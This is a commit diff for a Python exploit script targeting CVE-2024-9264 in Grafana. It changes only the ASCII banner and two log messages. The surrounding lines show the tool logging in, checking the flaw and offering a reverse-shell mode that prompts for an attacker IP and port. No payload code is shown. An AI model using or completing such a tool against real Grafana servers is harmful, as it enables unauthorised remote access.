File Renamed
This commit is contained in:
@@ -12,16 +12,19 @@ init(autoreset=True)
|
||||
# -------------------------
|
||||
# 프롤로그
|
||||
# -------------------------
|
||||
print(r"""
|
||||
_ __ _____ _____ _____ ___
|
||||
| | / /|_ _|/ ___||_ _| / _ \
|
||||
| |/ / | | \ `--. | | / /_\ \
|
||||
| \ | | `--. \ | | | _ |
|
||||
| |\ \ _| |_ /\__/ / _| |_ | | | |
|
||||
\_| \_/ \___/ \____/ \___/ \_| |_/
|
||||
|
||||
print(r"""
|
||||
|
||||
██╗ ██╗██╗███████╗██╗ █████╗
|
||||
██║ ██╔╝██║██╔════╝██║██╔══██╗
|
||||
█████╔╝ ██║███████╗██║███████║
|
||||
██╔═██╗ ██║╚════██║██║██╔══██║
|
||||
██║ ██╗██║███████║██║██║ ██║
|
||||
╚═╝ ╚═╝╚═╝╚══════╝╚═╝╚═╝ ╚═╝
|
||||
|
||||
Edited by : secKrity - 이민준
|
||||
CVE ID : CVE-2024-9264
|
||||
Base Score : 9.4 / CRITICAL
|
||||
Affected product : Grafana
|
||||
Vulnerable version : • v < 11.0.5+security-01
|
||||
• v < 11.0.6+security-01
|
||||
@@ -223,7 +226,7 @@ if __name__ == "__main__":
|
||||
log_event("Exploit Started")
|
||||
info("Trying to Login...")
|
||||
if exploit.login():
|
||||
success("Login Success")
|
||||
info("Login Success")
|
||||
info("Exploit...")
|
||||
output = exploit.check_vuln()
|
||||
if output:
|
||||
@@ -238,7 +241,7 @@ if __name__ == "__main__":
|
||||
log_event("Exploit with Reverse Shell Started")
|
||||
info("Trying to Get Reverse Shell...")
|
||||
if exploit.login():
|
||||
success("Login Success")
|
||||
info("Login Success")
|
||||
lhost = input("Attacker IP (LHOST): ")
|
||||
lport = input("Attacker PORT (LPORT): ")
|
||||
try:
|
||||
Reference in New Issue
Block a user